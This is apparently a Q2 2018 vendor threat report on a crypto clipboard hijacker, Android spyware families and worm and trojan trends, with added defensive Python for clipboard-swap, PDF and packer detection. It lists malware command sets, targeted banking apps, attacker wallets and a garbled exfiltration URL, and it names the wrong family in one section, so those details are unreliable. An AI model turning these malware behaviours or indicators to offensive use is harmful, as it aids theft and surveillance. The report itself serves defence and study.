Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or enter manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a gap they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
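An added example (not the report's code) of a paste-time check against the substitution just described: the address the user copied is compared with what the clipboard now holds, and a swap between two wallet-looking strings is reported before the transfer goes out. The recognisers are format-only (no checksum verification), the two sample addresses are the ones quoted above, and the helper names are this example's own.

```python
"""Paste-time check against the clipboard substitution described above: the
address the user copied is compared with what the clipboard now holds, and a
swap between two wallet-looking strings is reported before the transfer.

Added example for this report, not Comodo's code. The recognisers are
format-only (no checksum verification) and cover the address shapes that
clipboard hijackers commonly watch; the two sample addresses are the ones
quoted in the report, and the helper names are this example's own."""
import re
from dataclasses import dataclass
from typing import Optional

# Format-only patterns: a match means "looks like an address", not "is valid"
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),      # P2PKH / P2SH base58
    "btc_bech32": re.compile(r"^bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{6,87}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "xmr": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}


@dataclass
class PasteVerdict:
    copied_kind: Optional[str]
    clipboard_kind: Optional[str]
    swapped: bool
    reason: str


def classify_address(text: str) -> Optional[str]:
    """Return the address family the string resembles, or None."""
    s = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


def check_paste(copied: str, clipboard: str) -> PasteVerdict:
    """Compare what the user copied with what is about to be pasted."""
    copied_kind = classify_address(copied)
    clipboard_kind = classify_address(clipboard)
    if copied_kind is None:
        return PasteVerdict(copied_kind, clipboard_kind, False, "copied text is not an address")
    if copied.strip() == clipboard.strip():
        return PasteVerdict(copied_kind, clipboard_kind, False, "clipboard unchanged")
    if clipboard_kind is None:
        return PasteVerdict(copied_kind, clipboard_kind, False,
                            "clipboard changed to non-address text (user copied something else)")
    # Both strings look like wallets and they differ: the hijacker pattern
    return PasteVerdict(copied_kind, clipboard_kind, True,
                        f"{copied_kind} address replaced by a different {clipboard_kind} address")


# Sample from the report: the address the user copied and what the hijacker
# substituted. Both are legacy Bitcoin addresses.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SUBSTITUTED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

if __name__ == "__main__":
    verdict = check_paste(COPIED, SUBSTITUTED)
    print("SWAP DETECTED" if verdict.swapped else "ok", verdict.reason)
```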


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions.

Disguises of KevDroid: Version-1 Naver Defender; Version-2 Netease Defender; Version-3 PU

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (id, name, phone numbers) and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.

Disguises of Desert Scorpion: Version-1 Dardesh, Google Play Services, Instant Apps; Version-2 Settings

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

Disguises of Zoo Park: Version-1 Telegram Groups, انتخاب دھم; Version-2 Postrall, Yes For Referendum, انتخاب دھم; Version-3 Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机; Version-4 VPN Easy, DroFirewall, m_android

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and video
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Disguises of MikeSpy: Virtual Girlfriend

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend it has a bundle of malicious abilities:

• Takes control over the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Disguises of Xloader: Version-1 to Version-3 FaceBook, Chrome


After infection, Xloader connects to its C&C server and executes the following commands:

• Extract the device information
• Delete SMS
• Set ringer mode
• Monitor incoming SMS messages
• Clear memory
• Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs
• Extract contacts details
• Set Wi-Fi always turned on

Version 2 can execute additional commands:

• Send SMS and read outgoing SMS
• Enable and disable a Wi-Fi connection
• Access a location specified by attackers
• Make records
• Make calls

4.1.5 Stalker Spy

The next malware in our list is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy: App Distribution, FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Disguises of Mystery Bot: Version 1 Adobe Flash Player; Version 2 Flash Player

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device.


• Send_SMS: extract SMS content and send it to the C&C server
• Send_USSD: send the USSD to the C&C server
• Gethistory: monitor browser history
• Start_AllApp: gather info about installed applications
• Send_call: set the Intent action to call
• Forward_call: forward incoming calls
• ResForward_call: reset call forwarding
• Go_Smsmnd: delete SMS content
• Go_GetAlls: get SMS history
• Dell_sms: delete SMS content in a conversation
• Send_spam: send spam SMS
• Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp

Here are some commands from its Command and Control server:

• contacts: get contact details and email id
• Mute: set action to mute
• Mms: get MMS content
• info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert: Version 1 EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2 Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

• depostbankfinanzassistent
• plmbank
• aibibankandroid

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat (Version 1): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises shown above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which improves its mining potential. It is disseminated via the counterfeit apps shown below. But one of the vectors is especially interesting.

Disguises of CoinHive: Version-1 Netflix Hack, Instagram Hack; Version-2 TSF Launcher; Version-3 Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May



4.2.3 June 2018

Android-targeted malware in June



5 Malware in Q2 2018 The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 P2P Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and attackers take advantage of this by placing copies of malware in shared folders under attractive file names.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

This timeline shows that Russia suffered not one p2p Worm outbreak but many.

5.1.5 IM Worms

Social media and messaging accounts can also be used to spread malware. One type of computer worm, the instant messaging or "IM" worm, sends malicious links through services such as Facebook, either manually or automatically, from the accounts of already-infected users.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos worm, which spread banking malware through social networks and led to the FBI's arrest of 10 people in 2012.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. Once installed on a system or network, however, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be a separately installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was DarkComet (also written Dark Komet), a remote access trojan (RAT) that is now fully 10 years old. It lets an attacker control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft rates Ramnit as a "severe" threat: it infects Windows executable (EXE) and HTML files and spreads through infected removable drives such as USB flash drives. Because a file infector like Ramnit rides inside otherwise legitimate executables and HTML files, cleaning an endpoint without also scanning the removable drives and shares it touched usually leads to reinfection.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing countries, were affected.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign programs. Typically a Trojan grants a remote attacker the same rights and privileges as the local user, and Trojans are used for many kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common Trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group under the guise of a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

This timeline shows that this huge Trojan infestation took place at the beginning of June 2018.

5.2.4 Exploits

Exploits are pieces of software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare because the underlying vulnerabilities are typically patched quickly once discovered, after which the exploit loses most of its targets; the detections that remain point to unpatched software.

In Q2 2018 the majority of exploits detected by Comodo targeted a favorite of attackers, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents in a consistent form independent of application software, hardware and operating system. PDF remains attractive because readers execute embedded JavaScript and honour document-open actions, which gives an exploit a way to run as soon as the file is viewed.

Japan and India were the two countries where Comodo detected the majority of Exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.
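Because PDF exploits need the document to do something active (run JavaScript, fire an action on open, launch a program), a static keyword triage catches a large share of them before any sandbox is involved. The following is an added example of such a triage scanner, not code from the Comodo report; the name-object keywords and the hex-escape normalisation follow the approach of the well-known pdfid tool, and the two PDF byte strings are constructed samples, not real documents.

```python
"""Static triage of a PDF for the active-content markers that document exploits
depend on. Added example; keyword approach follows pdfid, samples are constructed."""
import re
from collections import Counter

# PDF name objects worth counting. None is malicious on its own; the
# combination (and a header that is not at offset 0) is what matters.
SUSPICIOUS_NAMES = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
                    "/EmbeddedFile", "/RichMedia", "/ObjStm"]

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Decode PDF name hex escapes (#xx) so that /J#61vaScript is counted as
    /JavaScript. Escaping keyword characters is a common way to dodge naive
    string scanners while the reader still parses the same name."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes) -> Counter:
    norm = normalize_names(data)
    counts = Counter()
    for name in SUSPICIOUS_NAMES:
        # A name ends at the next delimiter, so /JS must not match a longer name.
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
        counts[name] = len(re.findall(pattern, norm))
    return counts


def triage(data: bytes) -> dict:
    counts = count_names(data)
    findings = []

    header = data.find(b"%PDF-")
    if header < 0:
        findings.append("no %PDF header")
    elif header > 0:
        # Readers tolerate leading junk; exploit kits use it to confuse scanners.
        findings.append(f"%PDF header at offset {header}, not 0")

    has_js = counts["/JavaScript"] or counts["/JS"]
    has_trigger = counts["/OpenAction"] or counts["/AA"]
    if has_js:
        findings.append("embedded JavaScript")
    if has_trigger and (has_js or counts["/Launch"]):
        findings.append("action runs automatically on open (OpenAction/AA)")
    if counts["/Launch"]:
        findings.append("/Launch can start an external program")
    if counts["/EmbeddedFile"] or counts["/RichMedia"]:
        findings.append("embedded file or rich media payload")

    if counts["/ObjStm"] and not (has_js or has_trigger or counts["/Launch"]):
        # Object streams are deflate-compressed; every keyword above can hide
        # inside one, so a clean scan is not conclusive until they are inflated.
        findings.append("object streams present; inflate /ObjStm before trusting a clean scan")
        verdict = "inconclusive"
    else:
        verdict = "suspicious" if findings else "clean"
    return {"verdict": verdict, "findings": findings, "counts": dict(counts)}


# Constructed samples (not real documents).
BENIGN_PDF = (b"%PDF-1.4\n"
              b"1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
              b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
              b"3 0 obj<</Type/Page/Parent 2 0 R>>endobj\n"
              b"trailer<</Root 1 0 R>>\n%%EOF\n")

SUSPECT_PDF = (b"GARBAGE-BEFORE-HEADER\n%PDF-1.4\n"
               b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 4 0 R>>endobj\n"
               b"4 0 obj<</S/J#61vaScript/JS(app.alert(1))>>endobj\n"
               b"trailer<</Root 1 0 R>>\n%%EOF\n")

if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("suspect", SUSPECT_PDF)):
        print(label, triage(pdf))
```

The "inconclusive" verdict is deliberate: a file whose only notable feature is compressed object streams has hidden its structure from a keyword scan, and the right response is to inflate the streams and scan again rather than to wave it through.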

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructors

Constructors are applications used to generate malware files automatically, letting an operator produce new variants without writing code.

In Q2 Alamar was the #1 Constructor that Comodo detected. Microsoft rates this program as a "Severe" threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

This timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware is malicious executable code that has been hidden or obfuscated by compressing or "packing" it inside a larger, seemingly innocuous program or data stream; the hostile code can even take the form of scripts. The packed data carries its own decompression stub, or is built as a self-extracting archive, which recreates the original code in memory and then executes it. Encryption of the payload is another common way to conceal the malware from security software.

MUPX, or modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous executable formats across operating systems and uses the open-source UCL compression library, whose decompressor is only a few hundred bytes of code. Packing with UPX is not malicious by itself; the MUPX detection flags UPX-packed files whose headers or section names have been altered so that the stock UPX tool can no longer unpack them, a common trick for hindering analysis.

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
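A packed executable, UPX-style or modified, has a recognisable shape on disk: a section with no raw data but a large virtual size (where the unpacked image will be written), next to a section whose bytes are near-random because they are compressed. The following is an added example of those heuristics over the PE section table, not code from the Comodo report; the header offsets come from the PE/COFF specification, and the three executables it examines are constructed, minimal images built for the parser, not real programs (the "compressed" section is pseudo-random bytes standing in for packed code).

```python
"""Packer heuristics over a PE section table: UPX section names, an empty-on-disk
section, and per-section Shannon entropy. Added example; sample images are constructed."""
import math
import random
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY = 7.0   # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk the PE section table. Returns [(name, virtual_size, raw_size, raw_bytes)]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]    # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]       # COFF SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                                    # 40-byte section headers
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, vsize, raw_size, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess_packing(pe: bytes) -> dict:
    sections = parse_sections(pe)
    upx_names = any(name in UPX_SECTION_NAMES for name, _, _, _ in sections)
    # Packers reserve the unpacked image as a section with no data on disk.
    empty_on_disk = [name for name, vsize, raw, _ in sections if raw == 0 and vsize > 0]
    high_entropy = [name for name, _, raw, data in sections
                    if raw and shannon_entropy(data) > HIGH_ENTROPY]
    if upx_names:
        verdict = "packed (UPX)"
    elif empty_on_disk and high_entropy:
        # Renamed sections with a UPX-like layout: the 'modified UPX' case.
        verdict = "packed (unknown or modified packer)"
    elif high_entropy:
        verdict = "possibly packed or encrypted"
    else:
        verdict = "not packed"
    return {"verdict": verdict, "upx_names": upx_names,
            "empty_on_disk": empty_on_disk, "high_entropy": high_entropy}


def build_sample_pe(specs):
    """Construct a minimal PE32 image with (name, raw_bytes, virtual_size) sections.
    Only the fields the parser reads are meaningful; the image is not runnable."""
    n = len(specs)
    opt_size = 224                      # size of a PE32 optional header
    table = 64 + 4 + 20 + opt_size      # DOS header + "PE\0\0" + COFF + optional header
    raw_ptr = table + 40 * n
    headers, blobs = b"", b""
    for name, data, vsize in specs:
        ptr = raw_ptr + len(blobs) if data else 0
        headers += (name.encode().ljust(8, b"\0")
                    + struct.pack("<IIII", vsize, 0, len(data), ptr)
                    + b"\0" * 16)       # relocation/line-number fields, characteristics
        blobs += data
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)    # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + headers + blobs


_rng = random.Random(2018)
_COMPRESSED = bytes(_rng.getrandbits(8) for _ in range(4096))   # stands in for packed code

PLAIN_PE = build_sample_pe([(".text", b"\x90" * 2000 + b"\xC3" * 48, 0x800),
                            (".data", b"hello world\0" * 100, 0x500)])
UPX_PE = build_sample_pe([("UPX0", b"", 0x20000), ("UPX1", _COMPRESSED, 0x1000),
                          (".rsrc", b"\0" * 512, 0x200)])
MODIFIED_UPX_PE = build_sample_pe([(".text", b"", 0x20000), (".data", _COMPRESSED, 0x1000),
                                   (".rsrc", b"\0" * 512, 0x200)])

if __name__ == "__main__":
    for label, pe in (("plain", PLAIN_PE), ("upx", UPX_PE), ("modified upx", MODIFIED_UPX_PE)):
        print(label, assess_packing(pe))
```

The name check alone would miss the third sample, which is exactly the point of the MUPX category: once an attacker renames the sections and tweaks the header, only the layout and entropy still give the packer away, and even then the verdict says "packed", not "malicious".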

5.3.3 Email Flooders

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this behavior was Germany.

This timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action but are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

This timeline shows that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings. A quick check for Elex-style tampering is to compare the resolvers configured on an endpoint with the ones your DHCP servers actually hand out.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

Finally, this timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application category is alarming in that, during ordinary computer and Internet use, users often install these applications inadvertently. Examples include common adware programs, dialers, joke programs and widely disseminated bundled content such as images, videos and gossip.

